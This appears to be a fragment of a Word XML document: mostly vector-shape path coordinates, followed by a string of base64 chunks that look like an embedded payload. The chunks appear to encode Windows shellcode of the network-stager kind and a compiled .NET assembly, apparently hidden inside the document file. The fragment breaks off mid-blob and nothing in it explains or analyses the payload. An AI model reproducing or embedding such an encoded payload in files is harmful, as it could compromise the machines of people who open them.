,12921,2800,12925,2800,12929,2800,12934,2800,12938,2800,12942,2800,12947,2800,12951,2800,12956,2800,12961,2800,12966,2800,12971,2800,12976,2800,12981,2800,12986,2800,12992,2800,12997,2800,13002,2800,13008,2800,13014,2800,13020,2800,13026,2800,13032,2800,13038,2800,13044,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2800,13051,2799,13051,2799,13051,2799,13051,2799,13051,2799,13051,2799,13051,2798,13051,2798,13051,2798,13051,2798,13051,2798,13051,2797,13051,2797,13051,2797,13051,2797,13051,2796,13051,2796,13051,2795,13051,2795,13051,2795,13051,2794,13051,2794,13051,2793,13051,2793,13051,2793,13051,2792,13051,2792,13051,2791,13051,2790,13051,2790,13051,2789,13051,2789,13051,2788,13051,2787,13051,2787,13051,2786,13051,2785,13051,2784,13051,2783,13051,2783,13051,2782,13051,2781,13051,2780,13051,2779,13051,2778,13051,2777,13051,2776,13051,2775,13051,2774,13051,2773,13051,2772,13051,2770,13051,2769,13051,2768,13051,2767,13051,2765,13051,2764,13051,2763,13051,2761,13051,2760,13051,2758,13051,2757,13051,2755,13051,2753,13051,2752,13051,2750,13051,2748,13051,2747,13051,2745,13051,2743,13051,2741,13051,2739,13051,2737,13051,2735,13051,2733,13051,2731,13051,2729,13051,2727,13051,2725,13051,2723,13051,2720,13051,2718,13051,2716,13051,2713,13051,2711,13051,2708,13051,2706,13051,2703,13051,2700,13051,2698,13051,2695,13051,2692,13051,2689,13051,2686,13051,2683,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13051,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13050,2680,13049,2680,13049,2680,13049,2680,13049,2680,13048,2680,13048,2680,13048,2680,13048,2680,13047,2680,13047,2680,13046,2680,13046,2680,13046,2680,13045,2680,13045,2680,13044,2680,13044,2680,13043,2680,13042,2680,13042,2680,13041,2680,13040,2680,13039,2680,13039,2680,13038,2680,13037,2680,13036,2680,13035,2680,13034,2680,13033,2680,13032,2680,13030,2680,13029,2680,13028,2680,13027,2680,13025,2680,13024,2680,13023,2680,13021,2680,13019,2680,13018,2680,13016,2680,13014,2680,13013,2680,13011,2680,13009,2680,13007,2680,13005,2680,13003,2680,13001,2680,12999,2680,12996,2680,12994,2680,12992,2680,12989,2680,12987,2680,12984,2680,12981,2680,12979,2680,12976,2680,12973,2680,12970,2680,12967,2680,12964,2680,12961,2680,12958,2680,12954,2680,12951,2680,12947,2680,12944,2680,12940,2680,12936,2680,12933,2680,12929,2680,12925,2680,12921,2680,12917,2680,12912,2680,12908,2680,12904,2680,12899,2680,12895,2680,12890,2680,12885,2680,12880,2680,12875,2680,12870,2680,12865,2680,12860,2680,12855,2680,12849,2680,12844,2680,12838,2680,12832,2680,12826,2680,12820,2680,12814,2680,12808,2680,12802,2680,12795e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:671.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,13430" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:13430;width:130;height:250" coordorigin="2670,13430" coordsize="130,250" path="m2680,13441l2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2680,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2681,13441,2682,13441,2682,13441,2682,13441,2682,13441,2682,13441,2682,13441,2683,13441,2683,13441,2683,13441,2683,13441,2684,13441,2684,13441,2684,13441,2685,13441,2685,13441,2685,13441,2686,13441,2686,13441,2686,13441,2687,13441,2687,13441,2688,13441,2688,13441,2689,13441,2689,13441,2690,13441,2690,13441,2691,13441,2692,13441,2692,13441,2693,13441,2694,13441,2694,13441,2695,13441,2696,13441,2697,13441,2697,13441,2698,13441,2699,13441,2700,13441,2701,13441,2702,13441,2703,13441,2704,13441,2705,13441,2706,13441,2707,13441,2708,13441,2709,13441,2710,13441,2712,13441,2713,13441,2714,13441,2715,13441,2717,13441,2718,13441,2720,13441,2721,13441,2723,13441,2724,13441,2726,13441,2727,13441,2729,13441,2731,13441,2732,13441,2734,13441,2736,13441,2738,13441,2740,13441,2741,13441,2743,13441,2745,13441,2747,13441,2749,13441,2752,13441,2754,13441,2756,13441,2758,13441,2760,13441,2763,13441,2765,13441,2768,13441,2770,13441,2773,13441,2775,13441,2778,13441,2780,13441,2783,13441,2786,13441,2789,13441,2792,13441,2794,13441,2797,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13441,2800,13442,2800,13442,2800,13442,2800,13442,2800,13442,2800,13442,2800,13443,2800,13443,2800,13443,2800,13443,2800,13444,2800,13444,2800,13444,2800,13445,2800,13445,2800,13446,2800,13446,2800,13447,2800,13447,2800,13448,2800,13448,2800,13449,2800,13450,2800,13450,2800,13451,2800,13452,2800,13453,2800,13454,2800,13455,2800,13456,2800,13456,2800,13458,2800,13459,2800,13460,2800,13461,2800,13462,2800,13463,2800,13465,2800,13466,2800,13467,2800,13469,2800,13470,2800,13472,2800,13473,2800,13475,2800,13477,2800,13479,2800,13480,2800,13482,2800,13484,2800,13486,2800,13488,2800,13490,2800,13493,2800,13495,2800,13497,2800,13500,2800,13502,2800,13505,2800,13507,2800,13510,2800,13513,2800,13515,2800,13518,2800,13521,2800,13524,2800,13527,2800,13530,2800,13534,2800,13537,2800,13540,2800,13544,2800,13547,2800,13551,2800,13555,2800,13559,2800,13563,2800,13567,2800,13571,2800,13575,2800,13579,2800,13583,2800,13588,2800,13592,2800,13597,2800,13601,2800,13606,2800,13611,2800,13616,2800,13621,2800,13626,2800,13631,2800,13637,2800,13642,2800,13648,2800,13653,2800,13659,2800,13665,2800,13671,2800,13677,2800,13683,2800,13690,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2800,13696,2799,13696,2799,13696,2799,13696,2799,13696,2799,13696,2799,13696,2798,13696,2798,13696,2798,13696,2798,13696,2798,13696,2797,13696,2797,13696,2797,13696,2797,13696,2796,13696,2796,13696,2795,13696,2795,13696,2795,13696,2794,13696,2794,13696,2793,13696,2793,13696,2793,13696,2792,13696,2792,13696,2791,13696,2790,13696,2790,13696,2789,13696,2789,13696,2788,13696,2787,13696,2787,13696,2786,13696,2785,13696,2784,13696,2783,13696,2783,13696,2782,13696,2781,13696,2780,13696,2779,13696,2778,13696,2777,13696,2776,13696,2775,13696,2774,13696,2773,13696,2772,13696,2770,13696,2769,13696,2768,13696,2767,13696,2765,13696,2764,13696,2763,13696,2761,13696,2760,13696,2758,13696,2757,13696,2755,13696,2753,13696,2752,13696,2750,13696,2748,13696,2747,13696,2745,13696,2743,13696,2741,13696,2739,13696,2737,13696,2735,13696,2733,13696,2731,13696,2729,13696,2727,13696,2725,13696,2723,13696,2720,13696,2718,13696,2716,13696,2713,13696,2711,13696,2708,13696,2706,13696,2703,13696,2700,13696,2698,13696,2695,13696,2692,13696,2689,13696,2686,13696,2683,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13696,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13695,2680,13694,2680,13694,2680,13694,2680,13694,2680,13694,2680,13693,2680,13693,2680,13693,2680,13692,2680,13692,2680,13691,2680,13691,2680,13690,2680,13690,2680,13689,2680,13689,2680,13688,2680,13688,2680,13687,2680,13686,2680,13685,2680,13685,2680,13684,2680,13683,2680,13682,2680,13681,2680,13680,2680,13679,2680,13678,2680,13677,2680,13676,2680,13675,2680,13673,2680,13672,2680,13671,2680,13669,2680,13668,2680,13666,2680,13665,2680,13663,2680,13662,2680,13660,2680,13658,2680,13656,2680,13654,2680,13652,2680,13650,2680,13648,2680,13646,2680,13644,2680,13642,2680,13639,2680,13637,2680,13635,2680,13632,2680,13629,2680,13627,2680,13624,2680,13621,2680,13618,2680,13615,2680,13612,2680,13609,2680,13606,2680,13603,2680,13600,2680,13596,2680,13593,2680,13589,2680,13586,2680,13582,2680,13578,2680,13574,2680,13570,2680,13566,2680,13562,2680,13558,2680,13553,2680,13549,2680,13544,2680,13540,2680,13535,2680,13530,2680,13526,2680,13521,2680,13516,2680,13510,2680,13505,2680,13500,2680,13494,2680,13489,2680,13483,2680,13477,2680,13472,2680,13466,2680,13460,2680,13453,2680,13447,2680,13441e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:702.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14050" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14050;width:130;height:270" coordorigin="2670,14050" coordsize="130,270" path="m2680,14071l2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2680,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2681,14071,2682,14071,2682,14071,2682,14071,2682,14071,2682,14071,2682,14071,2683,14071,2683,14071,2683,14071,2683,14071,2684,14071,2684,14071,2684,14071,2685,14071,2685,14071,2685,14071,2686,14071,2686,14071,2686,14071,2687,14071,2687,14071,2688,14071,2688,14071,2689,14071,2689,14071,2690,14071,2690,14071,2691,14071,2692,14071,2692,14071,2693,14071,2694,14071,2694,14071,2695,14071,2696,14071,2697,14071,2697,14071,2698,14071,2699,14071,2700,14071,2701,14071,2702,14071,2703,14071,2704,14071,2705,14071,2706,14071,2707,14071,2708,14071,2709,14071,2710,14071,2712,14071,2713,14071,2714,14071,2715,14071,2717,14071,2718,14071,2720,14071,2721,14071,2723,14071,2724,14071,2726,14071,2727,14071,2729,14071,2731,14071,2732,14071,2734,14071,2736,14071,2738,14071,2740,14071,2741,14071,2743,14071,2745,14071,2747,14071,2749,14071,2752,14071,2754,14071,2756,14071,2758,14071,2760,14071,2763,14071,2765,14071,2768,14071,2770,14071,2773,14071,2775,14071,2778,14071,2780,14071,2783,14071,2786,14071,2789,14071,2792,14071,2794,14071,2797,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14071,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14072,2800,14073,2800,14073,2800,14073,2800,14073,2800,14074,2800,14074,2800,14074,2800,14075,2800,14075,2800,14076,2800,14076,2800,14077,2800,14077,2800,14078,2800,14078,2800,14079,2800,14079,2800,14080,2800,14081,2800,14082,2800,14082,2800,14083,2800,14084,2800,14085,2800,14086,2800,14087,2800,14088,2800,14089,2800,14090,2800,14091,2800,14092,2800,14094,2800,14095,2800,14096,2800,14098,2800,14099,2800,14101,2800,14102,2800,14104,2800,14105,2800,14107,2800,14109,2800,14111,2800,14113,2800,14115,2800,14117,2800,14119,2800,14121,2800,14123,2800,14125,2800,14128,2800,14130,2800,14132,2800,14135,2800,14138,2800,14140,2800,14143,2800,14146,2800,14149,2800,14152,2800,14155,2800,14158,2800,14161,2800,14164,2800,14167,2800,14171,2800,14174,2800,14178,2800,14181,2800,14185,2800,14189,2800,14193,2800,14197,2800,14201,2800,14205,2800,14209,2800,14214,2800,14218,2800,14222,2800,14227,2800,14232,2800,14237,2800,14241,2800,14246,2800,14251,2800,14257,2800,14262,2800,14267,2800,14273,2800,14278,2800,14284,2800,14290,2800,14295,2800,14301,2800,14307,2800,14314,2800,14320,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2800,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2799,14326,2798,14326,2798,14326,2798,14326,2798,14326,2798,14326,2797,14326,2797,14326,2797,14326,2797,14326,2796,14326,2796,14326,2795,14326,2795,14326,2795,14326,2794,14326,2794,14326,2793,14326,2793,14326,2793,14326,2792,14326,2792,14326,2791,14326,2790,14326,2790,14326,2789,14326,2789,14326,2788,14326,2787,14326,2787,14326,2786,14326,2785,14326,2784,14326,2783,14326,2783,14326,2782,14326,2781,14326,2780,14326,2779,14326,2778,14326,2777,14326,2776,14326,2775,14326,2774,14326,2773,14326,2772,14326,2770,14326,2769,14326,2768,14326,2767,14326,2765,14326,2764,14326,2763,14326,2761,14326,2760,14326,2758,14326,2757,14326,2755,14326,2753,14326,2752,14326,2750,14326,2748,14326,2747,14326,2745,14326,2743,14326,2741,14326,2739,14326,2737,14326,2735,14326,2733,14326,2731,14326,2729,14326,2727,14326,2725,14326,2723,14326,2720,14326,2718,14326,2716,14326,2713,14326,2711,14326,2708,14326,2706,14326,2703,14326,2700,14326,2698,14326,2695,14326,2692,14326,2689,14326,2686,14326,2683,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14324,2680,14324,2680,14324,2680,14324,2680,14323,2680,14323,2680,14323,2680,14322,2680,14322,2680,14321,2680,14321,2680,14320,2680,14320,2680,14319,2680,14319,2680,14318,2680,14317,2680,14317,2680,14316,2680,14315,2680,14314,2680,14313,2680,14312,2680,14311,2680,14310,2680,14309,2680,14308,2680,14307,2680,14306,2680,14305,2680,14304,2680,14302,2680,14301,2680,14300,2680,14298,2680,14297,2680,14295,2680,14294,2680,14292,2680,14290,2680,14288,2680,14287,2680,14285,2680,14283,2680,14281,2680,14279,2680,14276,2680,14274,2680,14272,2680,14270,2680,14267,2680,14265,2680,14262,2680,14260,2680,14257,2680,14254,2680,14252,2680,14249,2680,14246,2680,14243,2680,14240,2680,14236,2680,14233,2680,14230,2680,14227,2680,14223,2680,14219,2680,14216,2680,14212,2680,14208,2680,14204,2680,14200,2680,14196,2680,14192,2680,14188,2680,14184,2680,14179,2680,14175,2680,14170,2680,14166,2680,14161,2680,14156,2680,14151,2680,14146,2680,14141,2680,14135,2680,14130,2680,14125,2680,14119,2680,14114,2680,14108,2680,14102,2680,14096,2680,14090,2680,14084,2680,14077,2680,14071e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:734.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14690" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14690;width:130;height:270" coordorigin="2670,14690" coordsize="130,270" path="m2680,14716l2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2683,14716,2683,14716,2683,14716,2683,14716,2684,14716,2684,14716,2684,14716,2685,14716,2685,14716,2685,14716,2686,14716,2686,14716,2686,14716,2687,14716,2687,14716,2688,14716,2688,14716,2689,14716,2689,14716,2690,14716,2690,14716,2691,14716,2692,14716,2692,14716,2693,14716,2694,14716,2694,14716,2695,14716,2696,14716,2697,14716,2697,14716,2698,14716,2699,14716,2700,14716,2701,14716,2702,14716,2703,14716,2704,14716,2705,14716,2706,14716,2707,14716,2708,14716,2709,14716,2710,14716,2712,14716,2713,14716,2714,14716,2715,14716,2717,14716,2718,14716,2720,14716,2721,14716,2723,14716,2724,14716,2726,14716,2727,14716,2729,14716,2731,14716,2732,14716,2734,14716,2736,14716,2738,14716,2740,14716,2741,14716,2743,14716,2745,14716,2747,14716,2749,14716,2752,14716,2754,14716,2756,14716,2758,14716,2760,14716,2763,14716,2765,14716,2768,14716,2770,14716,2773,14716,2775,14716,2778,14716,2780,14716,2783,14716,2786,14716,2789,14716,2792,14716,2794,14716,2797,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14718,2800,14718,2800,14718,2800,14718,2800,14719,2800,14719,2800,14719,2800,14719,2800,14720,2800,14720,2800,14720,2800,14721,2800,14721,2800,14722,2800,14722,2800,14723,2800,14723,2800,14724,2800,14725,2800,14725,2800,14726,2800,14727,2800,14728,2800,14728,2800,14729,2800,14730,2800,14731,2800,14732,2800,14733,2800,14734,2800,14735,2800,14736,2800,14738,2800,14739,2800,14740,2800,14742,2800,14743,2800,14744,2800,14746,2800,14747,2800,14749,2800,14751,2800,14752,2800,14754,2800,14756,2800,14758,2800,14760,2800,14762,2800,14764,2800,14766,2800,14768,2800,14771,2800,14773,2800,14775,2800,14778,2800,14780,2800,14783,2800,14786,2800,14788,2800,14791,2800,14794,2800,14797,2800,14800,2800,14803,2800,14806,2800,14809,2800,14813,2800,14816,2800,14820,2800,14823,2800,14827,2800,14830,2800,14834,2800,14838,2800,14842,2800,14846,2800,14850,2800,14855,2800,14859,2800,14863,2800,14868,2800,14872,2800,14877,2800,14882,2800,14887,2800,14892,2800,14897,2800,14902,2800,14907,2800,14912,2800,14918,2800,14923,2800,14929,2800,14935,2800,14941,2800,14947,2800,14953,2800,14959,2800,14965,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2798,14972,2798,14972,2798,14972,2798,14972,2798,14972,2797,14972,2797,14972,2797,14972,2797,14972,2796,14972,2796,14972,2795,14972,2795,14972,2795,14972,2794,14972,2794,14972,2793,14972,2793,14972,2793,14972,2792,14972,2792,14972,2791,14972,2790,14972,2790,14972,2789,14972,2789,14972,2788,14972,2787,14972,2787,14972,2786,14972,2785,14972,2784,14972,2783,14972,2783,14972,2782,14972,2781,14972,2780,14972,2779,14972,2778,14972,2777,14972,2776,14972,2775,14972,2774,14972,2773,14972,2772,14972,2770,14972,2769,14972,2768,14972,2767,14972,2765,14972,2764,14972,2763,14972,2761,14972,2760,14972,2758,14972,2757,14972,2755,14972,2753,14972,2752,14972,2750,14972,2748,14972,2747,14972,2745,14972,2743,14972,2741,14972,2739,14972,2737,14972,2735,14972,2733,14972,2731,14972,2729,14972,2727,14972,2725,14972,2723,14972,2720,14972,2718,14972,2716,14972,2713,14972,2711,14972,2708,14972,2706,14972,2703,14972,2700,14972,2698,14972,2695,14972,2692,14972,2689,14972,2686,14972,2683,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14970,2680,14970,2680,14970,2680,14970,2680,14970,2680,14969,2680,14969,2680,14969,2680,14969,2680,14968,2680,14968,2680,14967,2680,14967,2680,14967,2680,14966,2680,14966,2680,14965,2680,14964,2680,14964,2680,14963,2680,14963,2680,14962,2680,14961,2680,14960,2680,14959,2680,14959,2680,14958,2680,14957,2680,14956,2680,14955,2680,14954,2680,14953,2680,14951,2680,14950,2680,14949,2680,14948,2680,14946,2680,14945,2680,14943,2680,14942,2680,14940,2680,14939,2680,14937,2680,14935,2680,14934,2680,14932,2680,14930,2680,14928,2680,14926,2680,14924,2680,14922,2680,14920,2680,14917,2680,14915,2680,14913,2680,14910,2680,14908,2680,14905,2680,14902,2680,14900,2680,14897,2680,14894,2680,14891,2680,14888,2680,14885,2680,14882,2680,14879,2680,14875,2680,14872,2680,14868,2680,14865,2680,14861,2680,14857,2680,14854,2680,14850,2680,14846,2680,14842,2680,14838,2680,14833,2680,14829,2680,14825,2680,14820,2680,14816,2680,14811,2680,14806,2680,14801,2680,14796,2680,14791,2680,14786,2680,14781,2680,14775,2680,14770,2680,14764,2680,14759,2680,14753,2680,14747,2680,14741,2680,14735,2680,14729,2680,14723,2680,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:766.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,15330" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:15330;width:130;height:270" coordorigin="2670,15330" coordsize="130,270" path="m2680,15347l2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2683,15347,2683,15347,2683,15347,2683,15347,2684,15347,2684,15347,2684,15347,2685,15347,2685,15347,2685,15347,2686,15347,2686,15347,2686,15347,2687,15347,2687,15347,2688,15347,2688,15347,2689,15347,2689,15347,2690,15347,2690,15347,2691,15347,2692,15347,2692,15347,2693,15347,2694,15347,2694,15347,2695,15347,2696,15347,2697,15347,2697,15347,2698,15347,2699,15347,2700,15347,2701,15347,2702,15347,2703,15347,2704,15347,2705,15347,2706,15347,2707,15347,2708,15347,2709,15347,2710,15347,2712,15347,2713,15347,2714,15347,2715,15347,2717,15347,2718,15347,2720,15347,2721,15347,2723,15347,2724,15347,2726,15347,2727,15347,2729,15347,2731,15347,2732,15347,2734,15347,2736,15347,2738,15347,2740,15347,2741,15347,2743,15347,2745,15347,2747,15347,2749,15347,2752,15347,2754,15347,2756,15347,2758,15347,2760,15347,2763,15347,2765,15347,2768,15347,2770,15347,2773,15347,2775,15347,2778,15347,2780,15347,2783,15347,2786,15347,2789,15347,2792,15347,2794,15347,2797,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15348,2800,15348,2800,15348,2800,15348,2800,15348,2800,15349,2800,15349,2800,15349,2800,15349,2800,15350,2800,15350,2800,15350,2800,15351,2800,15351,2800,15352,2800,15352,2800,15353,2800,15353,2800,15354,2800,15354,2800,15355,2800,15356,2800,15356,2800,15357,2800,15358,2800,15359,2800,15360,2800,15361,2800,15361,2800,15362,2800,15363,2800,15365,2800,15366,2800,15367,2800,15368,2800,15369,2800,15371,2800,15372,2800,15373,2800,15375,2800,15376,2800,15378,2800,15379,2800,15381,2800,15383,2800,15385,2800,15386,2800,15388,2800,15390,2800,15392,2800,15394,2800,15396,2800,15399,2800,15401,2800,15403,2800,15406,2800,15408,2800,15411,2800,15413,2800,15416,2800,15419,2800,15421,2800,15424,2800,15427,2800,15430,2800,15433,2800,15436,2800,15440,2800,15443,2800,15446,2800,15450,2800,15453,2800,15457,2800,15461,2800,15465,2800,15469,2800,15472,2800,15477,2800,15481,2800,15485,2800,15489,2800,15494,2800,15498,2800,15503,2800,15507,2800,15512,2800,15517,2800,15522,2800,15527,2800,15532,2800,15537,2800,15543,2800,15548,2800,15554,2800,15559,2800,15565,2800,15571,2800,15577,2800,15583,2800,15589,2800,15595,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2798,15602,2798,15602,2798,15602,2798,15602,2798,15602,2797,15602,2797,15602,2797,15602,2797,15602,2796,15602,2796,15602,2795,15602,2795,15602,2795,15602,2794,15602,2794,15602,2793,15602,2793,15602,2793,15602,2792,15602,2792,15602,2791,15602,2790,15602,2790,15602,2789,15602,2789,15602,2788,15602,2787,15602,2787,15602,2786,15602,2785,15602,2784,15602,2783,15602,2783,15602,2782,15602,2781,15602,2780,15602,2779,15602,2778,15602,2777,15602,2776,15602,2775,15602,2774,15602,2773,15602,2772,15602,2770,15602,2769,15602,2768,15602,2767,15602,2765,15602,2764,15602,2763,15602,2761,15602,2760,15602,2758,15602,2757,15602,2755,15602,2753,15602,2752,15602,2750,15602,2748,15602,2747,15602,2745,15602,2743,15602,2741,15602,2739,15602,2737,15602,2735,15602,2733,15602,2731,15602,2729,15602,2727,15602,2725,15602,2723,15602,2720,15602,2718,15602,2716,15602,2713,15602,2711,15602,2708,15602,2706,15602,2703,15602,2700,15602,2698,15602,2695,15602,2692,15602,2689,15602,2686,15602,2683,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15600,2680,15600,2680,15600,2680,15600,2680,15599,2680,15599,2680,15599,2680,15599,2680,15598,2680,15598,2680,15597,2680,15597,2680,15596,2680,15596,2680,15595,2680,15595,2680,15594,2680,15594,2680,15593,2680,15592,2680,15591,2680,15591,2680,15590,2680,15589,2680,15588,2680,15587,2680,15586,2680,15585,2680,15584,2680,15583,2680,15582,2680,15581,2680,15579,2680,15578,2680,15577,2680,15575,2680,15574,2680,15572,2680,15571,2680,15569,2680,15567,2680,15566,2680,15564,2680,15562,2680,15560,2680,15558,2680,15556,2680,15554,2680,15552,2680,15550,2680,15548,2680,15545,2680,15543,2680,15541,2680,15538,2680,15535,2680,15533,2680,15530,2680,15527,2680,15524,2680,15521,2680,15518,2680,15515,2680,15512,2680,15509,2680,15506,2680,15502,2680,15499,2680,15495,2680,15491,2680,15488,2680,15484,2680,15480,2680,15476,2680,15472,2680,15468,2680,15464,2680,15459,2680,15455,2680,15450,2680,15446,2680,15441,2680,15436,2680,15432,2680,15427,2680,15422,2680,15416,2680,15411,2680,15406,2680,15400,2680,15395,2680,15389,2680,15383,2680,15378,2680,15372,2680,15366,2680,15359,2680,15353,2680,1534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"WCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMd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yYHiej/"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"0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAEEaAIAADWJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXa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JmldGH/"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"1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1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ZNTagBW"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57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60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"U1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+m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b////AcMp"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61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"xnXBw7vwtaJWagBT/9UAAAATMAYAZQAAAAEAABEAIFUBAACNBgAAASXQAwAABCgGAAAKC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hYGjml+"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62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"AQAABH4CAAAEKAMAAAYLBhYHbigHAAAKBo5pKAgAAAoAfgkAAAoMFg1+CQAAChMEFhYHE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QQWEgMo"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63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"BAAABgwIFSgFAAAGJisAKkogABAAAIABAAAEH0CAAgAABCpCU0pCAQABAAAAAAAMAAAAd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jQuMC4z"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"MDMxOQAAAAAFAGwAAABgAgAAI34AAMwCAABkAwAAI1N0cmluZ3MAAAAAMAYAAAgAAAAjV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VMAOAYA"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"ABAAAAAjR1VJRAAAAEgGAAA0AQAAI0Jsb2IAAAAAAAAAAgAAAVfVAjQJAgAAAPolMwAWA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AABAAAA"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"DwAAAAQAAAADAAAABgAAAAwAAAALAAAABAAAAAEAAAABAAAAAQAAAAEAAAADAAAAAQAAA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AEAAAAB"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"AAAAAQAAAAAACgABAAAAAAAGAEsARAAGAFsBPwEGAHcBPwEGAKYBhgEGAMYBhgEGAPcBR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AAGAEEC"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"hgEGAFwCRAAGAJgChgEGAKcCRAAGAK0CRAAGANACRAAGAAID4wIGABQD4wIGAEcDNwMAA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AAAAQAA"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"AAAAAQABAAEAEAAhACkAB